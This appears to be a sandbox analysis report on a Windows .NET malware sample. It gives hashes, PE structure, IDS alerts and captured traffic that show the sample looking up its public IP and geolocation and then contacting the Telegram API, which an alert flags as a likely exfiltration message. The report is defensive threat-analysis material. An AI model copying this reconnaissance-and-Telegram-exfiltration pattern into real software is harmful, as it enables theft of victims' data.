                                                                                          SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                          SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                          SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                          Malicious:true
                                                                                          Reputation:high, very likely benign file
                                                                                          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Entropy (8bit):7.715274036238211
                                                                                          TrID:
                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                          • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                          File name:kP8EgMorTr.exe
                                                                                          File size:781'312 bytes
                                                                                          MD5:8a51bda9c0cd3d8519c1156dfa39426b
                                                                                          SHA1:bf1e7be7d44cf1f7499ee43d35aad3d9f8684b28
                                                                                          SHA256:6889d04a51c7a76b2ab1b4161b2b5e5d17dc2780e29dcc78b41460f982986786
                                                                                          SHA512:9b36b94da635cce4383993160b730bb32bfff0906d6c1f80c33ffab0294bba7714107f69a5fcbfdb424a2eaa0c5cd118f73c7f2611f26fbc7c75bca22f369084
                                                                                          SSDEEP:12288:fnM1cUoV+I4MVKWuLLFB5X/40NCrOtMPDREd1DfhI1RH4JBqMoEEF5LZ4HrYNrbC:fnMuRg7LSQQOCPdEd1GnH43qWEF5O0lO
                                                                                          TLSH:A1F4F1593368EA06C19647F55470E3F8077A9E8EA911E3038FFEBDEB39387016914297
                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....0{g..............0.................. ........@.. .......................@............@................................
                                                                                          Icon Hash:a3655757150102e0
                                                                                          Entrypoint:0x4bf3ba
                                                                                          Entrypoint Section:.text
                                                                                          Digitally signed:false
                                                                                          Imagebase:0x400000
                                                                                          Subsystem:windows gui
                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                          Time Stamp:0x677B30F3 [Mon Jan 6 01:25:07 2025 UTC]
                                                                                          TLS Callbacks:
                                                                                          CLR (.Net) Version:
                                                                                          OS Version Major:4
                                                                                          OS Version Minor:0
                                                                                          File Version Major:4
                                                                                          File Version Minor:0
                                                                                          Subsystem Version Major:4
                                                                                          Subsystem Version Minor:0
                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                          Instruction
                                                                                          jmp dword ptr [00402000h]
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
                                                                                          add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0xbf368          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0xc0000          0x1334        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0xc2000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity    File Type  Entropy              Characteristics
.text   0x2000           0xbd3c0       0xbd400   7918c343e2d0b2e9e079c97eb3bdde78  False     0.900661534015852  data       7.7229254201155815   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0xc0000          0x1334        0x1400    0467f8d148a0ab7fe1013c85a7edda8a  False     0.74296875         data       6.703983528880647    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xc2000          0xc           0x200     1001bc2b5a91ab3b37728ed8ad81db81  False     0.044921875        data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA      Size   Type                                                         Language  Country  ZLIB Complexity
RT_ICON        0xc00c8  0xf07  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                     0.8736677930855212
RT_GROUP_ICON  0xc0fe0  0x14   data                                                                            1.05
RT_VERSION     0xc1004  0x32c  data                                                                            0.42857142857142855
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                          Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2025-01-06T07:41:07.750465+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49701        132.226.8.169    80         TCP
2025-01-06T07:41:10.813013+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49701        132.226.8.169    80         TCP
2025-01-06T07:41:11.372807+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.7  49706        188.114.97.3     443        TCP
2025-01-06T07:41:14.219249+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49707        132.226.8.169    80         TCP
2025-01-06T07:41:15.625492+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49709        132.226.8.169    80         TCP
2025-01-06T07:41:19.984901+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49717        132.226.8.169    80         TCP
2025-01-06T07:41:20.969278+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49741        132.226.8.169    80         TCP
2025-01-06T07:41:22.422409+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH  2         192.168.2.7  49753        132.226.8.169    80         TCP
2025-01-06T07:41:25.823569+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H   3         192.168.2.7  49784        188.114.97.3     443        TCP
2025-01-06T07:41:26.698067+0100  1810007  Joe Security ANOMALY Telegram Send Message         1         192.168.2.7  49790        149.154.167.220  443        TCP
Timestamp                          Source Port  Dest Port  Source IP      Dest IP
                                                                                          Jan 6, 2025 07:41:22.374960899 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.375036001 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.375302076 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.375319958 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.422409058 CET4975380192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:22.850096941 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.859841108 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.859868050 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.998939037 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.998992920 CET44349761188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:22.999120951 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:22.999409914 CET49761443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:23.003523111 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:23.008306026 CET8049766132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.008460045 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:23.008546114 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:23.013318062 CET8049766132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.799911976 CET8049766132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.801115036 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:23.801147938 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.801254034 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:23.801501989 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:23.801515102 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:23.844305992 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.278697968 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.280160904 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:24.280185938 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.431288004 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.431355000 CET44349772188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.431505919 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:24.431802988 CET49772443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:24.434581995 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.435622931 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.441487074 CET8049766132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.441503048 CET8049778132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:24.441560984 CET4976680192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.441593885 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.441690922 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:24.446896076 CET8049778132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.205018044 CET8049778132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.206211090 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.206227064 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.206305027 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.207214117 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.207223892 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.250550032 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:25.671058893 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.672611952 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.672625065 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.823612928 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.823666096 CET44349784188.114.97.3192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.824137926 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.824434996 CET49784443192.168.2.7188.114.97.3
                                                                                          Jan 6, 2025 07:41:25.838157892 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:25.843111992 CET8049778132.226.8.169192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.843168020 CET4977880192.168.2.7132.226.8.169
                                                                                          Jan 6, 2025 07:41:25.846384048 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:25.846404076 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:25.846470118 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:25.846894026 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:25.846905947 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.456442118 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.456518888 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:26.459316969 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:26.459321976 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.459552050 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.460982084 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:26.503334045 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.698102951 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.698169947 CET44349790149.154.167.220192.168.2.7
                                                                                          Jan 6, 2025 07:41:26.698227882 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:26.698637009 CET49790443192.168.2.7149.154.167.220
                                                                                          Jan 6, 2025 07:41:32.494715929 CET4975380192.168.2.7132.226.8.169
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 07:41:05.546231985 CET | 57277 | 53 | 192.168.2.7 | 1.1.1.1
Jan 6, 2025 07:41:05.553126097 CET | 53 | 57277 | 1.1.1.1 | 192.168.2.7
Jan 6, 2025 07:41:07.743949890 CET | 60095 | 53 | 192.168.2.7 | 1.1.1.1
Jan 6, 2025 07:41:07.751379013 CET | 53 | 60095 | 1.1.1.1 | 192.168.2.7
Jan 6, 2025 07:41:25.838936090 CET | 62328 | 53 | 192.168.2.7 | 1.1.1.1
Jan 6, 2025 07:41:25.845702887 CET | 53 | 62328 | 1.1.1.1 | 192.168.2.7

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 6, 2025 07:41:05.546231985 CET | 192.168.2.7 | 1.1.1.1 | 0xea15 | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:07.743949890 CET | 192.168.2.7 | 1.1.1.1 | 0x68bd | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:25.838936090 CET | 192.168.2.7 | 1.1.1.1 | 0x4e1c | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 6, 2025 07:41:05.553126097 CET | 1.1.1.1 | 192.168.2.7 | 0xea15 | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 6, 2025 07:41:05.553126097 CET | 1.1.1.1 | 192.168.2.7 | 0xea15 | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:05.553126097 CET | 1.1.1.1 | 192.168.2.7 | 0xea15 | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:05.553126097 CET | 1.1.1.1 | 192.168.2.7 | 0xea15 | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:05.553126097 CET | 1.1.1.1 | 192.168.2.7 | 0xea15 | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:05.553126097 CET | 1.1.1.1 | 192.168.2.7 | 0xea15 | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:07.751379013 CET | 1.1.1.1 | 192.168.2.7 | 0x68bd | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:07.751379013 CET | 1.1.1.1 | 192.168.2.7 | 0x68bd | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 6, 2025 07:41:25.845702887 CET | 1.1.1.1 | 192.168.2.7 | 0x4e1c | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false

• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49701 | 132.226.8.169 | 80 | 7432 | C:\Users\user\Desktop\kP8EgMorTr.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:41:05.580152988 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 6, 2025 07:41:07.447810888 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:41:07 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:41:07.453089952 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 07:41:07.703239918 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:41:07 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 6, 2025 07:41:08.495987892 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 07:41:10.763484001 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:41:10 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49707 | 132.226.8.169 | 80 | 7432 | C:\Users\user\Desktop\kP8EgMorTr.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:41:11.396967888 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 07:41:14.171020031 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:41:14 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49709 | 132.226.8.169 | 80 | 7432 | C:\Users\user\Desktop\kP8EgMorTr.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:41:14.799247026 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 07:41:15.574734926 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:41:15 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49717 | 132.226.8.169 | 80 | 7432 | C:\Users\user\Desktop\kP8EgMorTr.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:41:16.189749002 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 07:41:19.941728115 CET | 697 | IN | HTTP/1.1 504 Gateway Time-out
Date: Mon, 06 Jan 2025 06:41:19 GMT
Content-Type: text/html
Content-Length: 557
Connection: keep-alive
Data Ascii: <html><head><title>504 Gateway Time-out</title></head><body><center><h1>504 Gateway Time-out</h1></center><hr><center></center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49741 | 132.226.8.169 | 80 | 7432 | C:\Users\user\Desktop\kP8EgMorTr.exe
Timestamp | Bytes transferred | Direction | Data
Jan 6, 2025 07:41:20.110219955 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 6, 2025 07:41:20.921945095 CET | 273 | IN | HTTP/1.1 200 OK
Date: Mon, 06 Jan 2025 06:41:20 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session ID: 5  Source IP: 192.168.2.7  Source Port: 49753  Destination IP: 132.226.8.169  Destination Port: 80  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: Jan 6, 2025 07:41:21.523199081 CET  Bytes transferred: 127  Direction: OUT  Data: GET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Timestamp: Jan 6, 2025 07:41:22.372560024 CET  Bytes transferred: 273  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:22 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session ID: 6  Source IP: 192.168.2.7  Source Port: 49766  Destination IP: 132.226.8.169  Destination Port: 80  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: Jan 6, 2025 07:41:23.008546114 CET  Bytes transferred: 151  Direction: OUT  Data: GET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Timestamp: Jan 6, 2025 07:41:23.799911976 CET  Bytes transferred: 273  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:23 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session ID: 7  Source IP: 192.168.2.7  Source Port: 49778  Destination IP: 132.226.8.169  Destination Port: 80  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: Jan 6, 2025 07:41:24.441690922 CET  Bytes transferred: 151  Direction: OUT  Data: GET / HTTP/1.1
                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                          Host: checkip.dyndns.org
                                                                                          Connection: Keep-Alive
                                                                                          Timestamp: Jan 6, 2025 07:41:25.205018044 CET  Bytes transferred: 273  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:25 GMT
                                                                                          Content-Type: text/html
                                                                                          Content-Length: 104
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-cache
                                                                                          Pragma: no-cache
                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                          Session ID: 0  Source IP: 192.168.2.7  Source Port: 49703  Destination IP: 188.114.97.3  Destination Port: 443  PID: 7432  Process: C:\Users\user\Desktop\kP8EgMorTr.exe
                                                                                          Timestamp: 2025-01-06 06:41:08 UTC  Bytes transferred: 85  Direction: OUT  Data: GET /xml/8.46.123.189 HTTP/1.1
                                                                                          Host: reallyfreegeoip.org
                                                                                          Connection: Keep-Alive
                                                                                          Timestamp: 2025-01-06 06:41:08 UTC  Bytes transferred: 857  Direction: IN  Data: HTTP/1.1 200 OK
                                                                                          Date: Mon, 06 Jan 2025 06:41:08 GMT
                                                                                          Content-Type: text/xml
                                                                                          Content-Length: 362
                                                                                          Connection: close
                                                                                          Age: 1460457
                                                                                          Cache-Control: max-age=31536000
                                                                                          cf-cache-status: HIT
                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xVaotzT3ecLl63OAcd7BI91ehzAI85QtV0e486PZctFaSw2HKj3Swef2O9v6kM6YGMSdG2Gmh09aX%2F8IrGXqRVEw4mQgpAWjEJDP56tDl9rG1KSp%2BnZeZzX1Uv%2Fq%2FvpHsG6ASS0K"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fd9b87b9d2042fd-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
